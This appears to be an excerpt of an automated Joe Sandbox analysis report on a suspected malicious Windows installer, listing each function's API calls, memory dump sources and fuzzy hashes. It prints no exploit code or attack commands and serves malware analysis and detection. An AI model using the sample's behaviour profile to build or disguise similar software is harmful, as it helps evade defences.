Instruction ID: fe6b2c3b67c783468e3d99353c909943c883638b9352ade8fce09ac857d2aff0
Opcode Fuzzy Hash: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
Instruction Fuzzy Hash: EEF0F925305E5359D62133365C85EAF1554CF96364719073BB861B11D1CB3C8943CDBD

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,?), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
Opcode Fuzzy Hash: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E

Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405B58
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6

Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
Instruction ID: fec69ff260b0ac9ecd577f12e686b41ce403e552977328a8d437569390afa8be
Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
Instruction Fuzzy Hash: 22E086329041246ADB103EF20E8DD7F32785B45714B54023FB511BA2C2D5FC1D42476E

Function 00401718 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
Instruction ID: d23dd041866cef5afdca28ea12ef8b7a62ea4ba21799db9ef353d819d1220e11
Opcode Fuzzy Hash: 92fe3424e3db77cce8708dc325f0d132fa3c79659b3364ce78a5e3850e78d784
Instruction Fuzzy Hash: 55E048B1314100AAD710DF65DD48EAA7768DB01368F304576F211B61D1D2B469419729

Function 00402C42 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768

Function 00405BD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9

Function 10002796 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027B4

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 4a9ded8e7257bdb173b40b31e6f72bab7f1256b0bf9ca600b2aeebe95f436f9e
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: CFF09BF19097A0DEF350DF688C847063BE4E3983C4B03852AE3A8E6268EB344048CF19

Function 00402293 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
Instruction ID: 6bbe31101158ed697117799215e52ff0bd2f9d85eb69b818a49c661f2cf41376
Opcode Fuzzy Hash: e0fbceb2114e9abc89c61ef25d156eb7acc43ea2741118eddc539df022ec75b6
Instruction Fuzzy Hash: BCE08630841204BBDB00AFA0CD49DEE3B78EF11340F10443AF540BB0D1E7F89580975A

Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D

Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09

Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
Instruction ID: 218267b357b67079b54de8dffa8c027c75f66e7c1ef01c1e874d3fe206bc0dcd
Opcode Fuzzy Hash: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
Instruction Fuzzy Hash: A3D0C9B7B181009BE750EFB9AE8985B73A8E7513297604C73D942F20A1D578D8028A79

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
